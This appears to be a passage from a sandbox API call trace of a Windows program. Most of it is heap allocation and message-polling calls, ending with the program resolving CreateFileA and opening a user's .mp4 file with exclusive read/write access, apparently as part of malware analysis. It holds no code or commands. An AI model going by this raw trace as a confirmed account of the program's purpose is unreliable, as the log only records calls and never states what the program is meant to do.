lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.377] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.378] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.378] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.378] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0042.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af608 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0042.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889538 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0042.378] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0042.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0042.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0042.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0042.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.381] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.383] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0042.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c9a0 [0042.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c9a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0042.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.384] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0042.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9a0 [0042.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c9a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0042.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.384] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0042.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0042.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0042.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d) returned 0x7ab260 [0042.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4", cchWideChar=61, lpMultiByteStr=0x7ab260, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4", lpUsedDefaultChar=0x0) returned 61 [0042.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.386] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\eahi4-2wsrei.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 